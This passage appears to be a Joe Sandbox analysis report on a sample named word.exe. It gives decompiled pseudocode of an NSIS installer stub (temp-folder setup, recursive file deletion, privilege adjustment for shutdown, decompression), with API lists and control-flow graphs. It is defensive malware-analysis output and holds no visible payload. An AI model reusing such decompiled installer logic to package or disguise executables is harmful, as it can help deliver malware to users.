														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(0x435800, _t221);
												E00406668(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x435000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                                    0x0040364e
                                    0x0040364f
                                    0x00403656
                                    0x00403659
                                    0x00403660
                                    0x00403663
                                    0x00403676
                                    0x0040367c
                                    0x0040367f
                                    0x00403682
                                    0x00403690
                                    0x00403698
                                    0x004036a3
                                    0x004036bc
                                    0x004036be
                                    0x004036c6
                                    0x004036c6
                                    0x004036d1
                                    0x004036d3
                                    0x004036d3
                                    0x004036e8
                                    0x0040370d
                                    0x0040371b
                                    0x0040371e
                                    0x00403725
                                    0x0040372c
                                    0x0040372c
                                    0x00403725
                                    0x0040372e
                                    0x00403733
                                    0x00403734
                                    0x00403740
                                    0x00403744
                                    0x0040374b
                                    0x00403759
                                    0x0040375e
                                    0x00403765
                                    0x00403769
                                    0x0040376d
                                    0x0040376f
                                    0x0040376f
                                    0x0040376d
                                    0x00403776
                                    0x0040377d
                                    0x00403783
                                    0x0040379b
                                    0x004037ab
                                    0x004037bd
                                    0x004037c4
                                    0x004037c6
                                    0x004037c7
                                    0x004037d8
                                    0x004037dc
                                    0x004037dc
                                    0x004037ef
                                    0x004037f1
                                    0x004038eb
                                    0x004038eb
                                    0x004038ee
                                    0x004038f1
                                    0x00000000
                                    0x00000000
                                    0x004037fb
                                    0x004037fc
                                    0x004037ff
                                    0x00403808
                                    0x00403808
                                    0x0040380b
                                    0x0040380e
                                    0x00403811
                                    0x00403814
                                    0x00403814
                                    0x00403814
                                    0x00403815
                                    0x00403819
                                    0x004038d9
                                    0x004038e2
                                    0x004038e4
                                    0x004038e7
                                    0x004038ea
                                    0x004038ea
                                    0x004038ea
                                    0x00000000
                                    0x0040381f
                                    0x00403820
                                    0x00403821
                                    0x00403825
                                    0x0040383f
                                    0x00403846
                                    0x00403859
                                    0x0040385a
                                    0x0040386f
                                    0x00403874
                                    0x00403876
                                    0x00403878
                                    0x00403894
                                    0x0040389b
                                    0x004038ae
                                    0x004038af
                                    0x004038c4
                                    0x004038ca
                                    0x004038cc
                                    0x004038ce
                                    0x004038d6
                                    0x004038d8
                                    0x00000000
                                    0x004038d8
                                    0x004038d2
                                    0x004038d4
                                    0x004038f9
                                    0x004038fd
                                    0x00403906
                                    0x0040390b
                                    0x00403911
                                    0x0040391c
                                    0x0040391e
                                    0x00403923
                                    0x00403925
                                    0x0040397d
                                    0x00403982
                                    0x0040398b
                                    0x00403992
                                    0x00403995
                                    0x00403b6c
                                    0x00403b6c
                                    0x00403b71
                                    0x00403b7a
                                    0x00403b97
                                    0x00403c0f
                                    0x00403c0f
                                    0x00403c17
                                    0x00403c19
                                    0x00403c19
                                    0x00403c1f
                                    0x00403c1f
                                    0x00403bae
                                    0x00403bba
                                    0x00403bcb
                                    0x00403bd2
                                    0x00403bd9
                                    0x00403bd9
                                    0x00403be1
                                    0x00403bed
                                    0x00403bfb
                                    0x00403c06
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403bef
                                    0x00403bef
                                    0x00403bf0
                                    0x00403bf2
                                    0x00403bf3
                                    0x00403bf4
                                    0x00403bf9
                                    0x00403c08
                                    0x00403c0a
                                    0x00000000
                                    0x00403c0a
                                    0x00000000
                                    0x00403bf9
                                    0x00403bed
                                    0x00403b84
                                    0x00403b8b
                                    0x00403b8b
                                    0x004039a1
                                    0x00403a48
                                    0x00403a48
                                    0x00403a54
                                    0x00000000
                                    0x00403a54
                                    0x004039b2
                                    0x004039ba
                                    0x00403a0c
                                    0x00403a0c
                                    0x00403a12
                                    0x00403a19
                                    0x00403a67
                                    0x00403a69
                                    0x00403a6e
                                    0x00403a70
                                    0x00403a78
                                    0x00403a78
                                    0x00403a83
                                    0x00403a8f
                                    0x00403a95
                                    0x00403a97
                                    0x00403b6a
                                    0x00403b6a
                                    0x00403b6a
                                    0x00000000
                                    0x00403a9d
                                    0x00403a9d
                                    0x00403a9f
                                    0x00403aa0
                                    0x00403aa9
                                    0x00403aa2
                                    0x00403aa2
                                    0x00403aa2
                                    0x00403aaf
                                    0x00403ab7
                                    0x00403abe
                                    0x00403ac6
                                    0x00403ac6
                                    0x00403ad3
                                    0x00403adf
                                    0x00403ae9
                                    0x00403ae9
                                    0x00403aeb
                                    0x00403af2
                                    0x00403afc
                                    0x00403b08
                                    0x00403b0e
                                    0x00403b14
                                    0x00403b17
                                    0x00403b21
                                    0x00403b27
                                    0x00403b29
                                    0x00403b2d
                                    0x00403b3e
                                    0x00403b44
                                    0x00403b49
                                    0x00403b4b
                                    0x00403b4e
                                    0x00403b54
                                    0x00403b54
                                    0x00403b4b
                                    0x00403b29
                                    0x00403b57
                                    0x00403b5e
                                    0x00403b5e
                                    0x00403b5e
                                    0x00403b5e
                                    0x00403b65
                                    0x00000000
                                    0x00403b65
                                    0x00403a97
                                    0x00403a1b
                                    0x00403a1e
                                    0x00403a22
                                    0x00403a27
                                    0x00403a29
                                    0x00000000
                                    0x00000000
                                    0x00403a35
                                    0x00403a40
                                    0x00403a45
                                    0x00000000
                                    0x00403a45
                                    0x004039c3
                                    0x004039db
                                    0x004039ec
                                    0x004039ed
                                    0x004039f1
                                    0x004039f3
                                    0x00403a01
                                    0x00403a08
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403a08
                                    0x00403a0a
                                    0x00000000
                                    0x00403a0a
                                    0x0040392d
                                    0x00403939
                                    0x0040393e
                                    0x00403943
                                    0x00403945
                                    0x00000000
                                    0x00000000
                                    0x0040394d
                                    0x00403955
                                    0x00403966
                                    0x0040396e
                                    0x00403970
                                    0x00403975
                                    0x00403977
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403977
                                    0x00000000
                                    0x004038d4
                                    0x0040387d
                                    0x0040387f
                                    0x00000000
                                    0x00000000
                                    0x00403881
                                    0x00403885
                                    0x00403889
                                    0x00403890
                                    0x00403890
                                    0x00403890
                                    0x00403890
                                    0x00000000
                                    0x00403890
                                    0x0040388b
                                    0x0040388e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040388e
                                    0x00403827
                                    0x0040382b
                                    0x0040382e
                                    0x00403835
                                    0x00403835
                                    0x00000000
                                    0x00403835
                                    0x00403830
                                    0x00403833
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403833
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403801
                                    0x00403801
                                    0x00403802
                                    0x00403803
                                    0x00403803
                                    0x00000000
                                    0x00403801
                                    0x00000000

                                    APIs
                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                    • CharNextW.USER32(00000000), ref: 004037E9
                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040391C
                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                    • lstrcatW.KERNEL32 ref: 00403939
                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040394D
                                    • lstrcatW.KERNEL32 ref: 00403955
                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                    • lstrcatW.KERNEL32 ref: 00403A69
                                    • lstrcatW.KERNEL32 ref: 00403A78
                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                    • lstrcatW.KERNEL32 ref: 00403A83
                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                    • CopyFileW.KERNEL32 ref: 00403B21
                                    • CloseHandle.KERNEL32(00000000), ref: 00403B4E
                                    • ExitProcess.KERNELBASE(?), ref: 00403B6C
                                    • OleUninitialize.OLE32 ref: 00403B71
                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                    • API String ID: 2292928366-1826018249
                                    • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                    • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                    C-Code - Quality: 98%
                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                    0x00405d7e
                                    0x00405d83
                                    0x00405d8c
                                    0x00405d8f
                                    0x00405d97
                                    0x00405d9a
                                    0x00405d9d
                                    0x00405da5
                                    0x00405da7
                                    0x00405da8
                                    0x00000000
                                    0x00405da8
                                    0x00405db3
                                    0x00405db6
                                    0x00405db6
                                    0x00405db6
                                    0x00405dba
                                    0x00405dcd
                                    0x00405dd4
                                    0x00405dd9
                                    0x00405ddd
                                    0x00405ded
                                    0x00405ddf
                                    0x00405de5
                                    0x00405de5
                                    0x00405df2
                                    0x00405df6
                                    0x00405e02
                                    0x00405e08
                                    0x00405e0d
                                    0x00405e13
                                    0x00405e1e
                                    0x00405e24
                                    0x00405e26
                                    0x00405e29
                                    0x00405ed3
                                    0x00405ed3
                                    0x00405ed7
                                    0x00405ed9
                                    0x00405ed9
                                    0x00405ed9
                                    0x00405ed9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00405e2f
                                    0x00405e2f
                                    0x00405e2f
                                    0x00405e37
                                    0x00405e57
                                    0x00405e5f
                                    0x00405e64
                                    0x00405e6b
                                    0x00405e86
                                    0x00405e8b
                                    0x00405e8d
                                    0x00405eb1
                                    0x00405e8f
                                    0x00405e8f
                                    0x00405e92
                                    0x00405ea6
                                    0x00405e94
                                    0x00405e97
                                    0x00405e9f
                                    0x00405e9f
                                    0x00405e92
                                    0x00405e6d
                                    0x00405e73
                                    0x00405e75
                                    0x00405e7b
                                    0x00405e7b
                                    0x00405e75
                                    0x00000000
                                    0x00405e6b
                                    0x00405e39
                                    0x00405e41
                                    0x00000000
                                    0x00000000
                                    0x00405e43
                                    0x00405e4b
                                    0x00000000
                                    0x00000000
                                    0x00405e4d
                                    0x00405e55
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00405eb6
                                    0x00405ebe
                                    0x00405ec4
                                    0x00405ec4
                                    0x00405ecd
                                    0x00000000
                                    0x00405ecd
                                    0x00405df8
                                    0x00405e00
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00405dbc
                                    0x00405dbc
                                    0x00405dbe
                                    0x00405ede
                                    0x00405ee0
                                    0x00405ee3
                                    0x00405f34
                                    0x00405f34
                                    0x00405f34
                                    0x00405ee5
                                    0x00405ee8
                                    0x00405ef3
                                    0x00405ef8
                                    0x00405efa
                                    0x00000000
                                    0x00000000
                                    0x00405efd
                                    0x00405f09
                                    0x00405f0e
                                    0x00405f10
                                    0x00000000
                                    0x00405f2b
                                    0x00405f12
                                    0x00405f15
                                    0x00000000
                                    0x00000000
                                    0x00405f1a
                                    0x00000000
                                    0x00405f21
                                    0x00405eea
                                    0x00405eea
                                    0x00000000
                                    0x00405eea
                                    0x00405dc4
                                    0x00405dc7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00405dc7

                                    APIs
                                    • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405D9D
                                    • lstrcatW.KERNEL32 ref: 00405DE5
                                    • lstrcatW.KERNEL32 ref: 00405E08
                                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nso9272.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E0E
                                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nso9272.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nso9272.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E1E
                                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nso9272.tmp\*.*$\*.*
                                    • API String ID: 2035342205-3901916945
                                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                                    C-Code - Quality: 98%
                                    			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
